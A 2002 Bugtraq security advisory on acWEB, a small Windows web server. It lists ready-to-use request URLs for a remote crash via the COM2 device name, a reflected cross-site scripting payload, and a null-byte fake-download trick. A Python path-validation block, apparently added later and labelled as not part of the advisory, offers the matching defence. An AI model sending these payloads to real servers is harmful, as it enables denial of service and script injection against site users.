Bugtraq mailing list archives

IIL Advisory: Vulnerabilities in acWEB HTTP server


From: DownBload <downbload () hotmail com>
Date: 25 Sep 2002 09:08:20 -0000




                    [ Illegal Instruction Labs Advisory ]
[-------------------------------------------------------------------------]
Advisory name: Vulnerabilities in acWEB HTTP server
Advisory number: 13
Application: acWEB HTTP server
Author e-mail: spf () users sourceforge net
Homepage: somewhere on sourceforge
Date: 10.09.2002
Impact: DoS, XSS, etc.
Tested on: Windows 98
Discovered by: DownBload                                                
Mail me @: downbload () hotmail com     




======[ Overview 

Sourceforge: "acWEB is an OpenSource replacement for MS IIS and other 
proprietary WEB servers for Windows. Unlike IIS, acWEB is not affected by 
viruses like CodeRed, Nimda, etc :)."

/ME says: acWEB is simple HTTP server for Windows. It is perfect for tiny 
companies, and for home use.




======[ Problem(s)      

===[ Remote DoS
The first vulnerability I discovered in the acWEB HTTP server was a remote DoS.
It is possible to crash acWEB (and Windows too) with a simple HTTP request:
---cut here---
http://www.victim.com/com2.bat 
---cut here---


===[ XSS a.k.a CSS bug
XSS code execution:
---cut here---
http://www.victim.com/%db<script>alert('Illegal%20Instruction%20Labs%200wnz%20YoU!!!');</script>/
---cut here---


===[ Fake file download
---cut here---
http://www.victim.com/|%5chacked.txt%00
---cut here---

When this request is sent to the acWEB HTTP server, acWEB will return:
---------------
HTTP/1.0 200 OK
Content-Length: 0
Connection: Close
Content-Type: application/octet-stream
Server: Eserv/3.x

---------------
That is fuqn weird, because the file 'hacked.txt' doesn't exist. The acWEB HTTP
server will send us an empty 'hacked.txt' file to download.
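As an added example (not part of this advisory and not acWEB's code), here are the request-path checks a Windows HTTP server would need in order to reject the three requests above: reserved DOS device names regardless of extension, NUL bytes and pipe characters in the decoded path, and HTML-escaping of the path before it is echoed into an error page. The function names and the "latin-1" decoding of the raw bytes are my own assumptions.

```python
import html
import re
from urllib.parse import unquote_to_bytes

# Windows reserved device names. Opening "com2.bat" touches the COM2 port no
# matter what the extension is, which is what the DoS request above relies on.
RESERVED_DEVICES = (
    {"CON", "PRN", "AUX", "NUL"}
    | {f"COM{i}" for i in range(1, 10)}
    | {f"LPT{i}" for i in range(1, 10)}
)


def reserved_device_name(segment: str) -> bool:
    """True if one path segment names a reserved device (extension and trailing spaces ignored)."""
    base = segment.split(".", 1)[0].rstrip(" ")
    return base.upper() in RESERVED_DEVICES


def check_request_path(raw_path: str) -> list[str]:
    """Return the reasons a percent-encoded request path must be refused (empty list = accept).

    Decoding happens once, on bytes, so %00 and %5c cannot hide from the checks.
    """
    decoded = unquote_to_bytes(raw_path)
    issues = []
    if b"\x00" in decoded:
        issues.append("null byte")          # the fake-download request ends in %00
    if b"|" in decoded:
        issues.append("pipe character")     # the fake-download request starts with |
    text = decoded.decode("latin-1")        # assumption: byte-for-byte view of the path
    if "<" in text or ">" in text:
        issues.append("html markup")        # the XSS request carries a <script> tag
    for segment in re.split(r"[/\\]", text):  # both / and \ act as separators on Windows
        if reserved_device_name(segment):
            issues.append(f"reserved device name: {segment}")
    return issues


def safe_reflect(raw_path: str) -> str:
    """Escape the decoded path before echoing it in an HTML response (the step behind the XSS)."""
    return html.escape(unquote_to_bytes(raw_path).decode("latin-1"), quote=True)


if __name__ == "__main__":
    # Constructed inputs taken from the three requests in the advisory
    for path in ("/com2.bat", "/|%5chacked.txt%00", "/%db<script>alert('x');</script>/"):
        print(path, "->", check_request_path(path) or "OK")
```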




======[ Exploit

This can be exploited with a browser, so I won't write an exploit for this...or 
maybe one day :).




======[ Greetz 

Greetz goes to #hr.hackers, #ii-labs and #linux <irc.carnet.hr>. 
Special greetz goes to (rand()): St0rm, BoyScout, h4z4rd, finis, Sunnis, 
Fr1c, phreax, LekaMan, StYx, harlequin, Astral and www.active-security.org 
(NetZero & Paradox). I'm very sorry if I forgot someone.

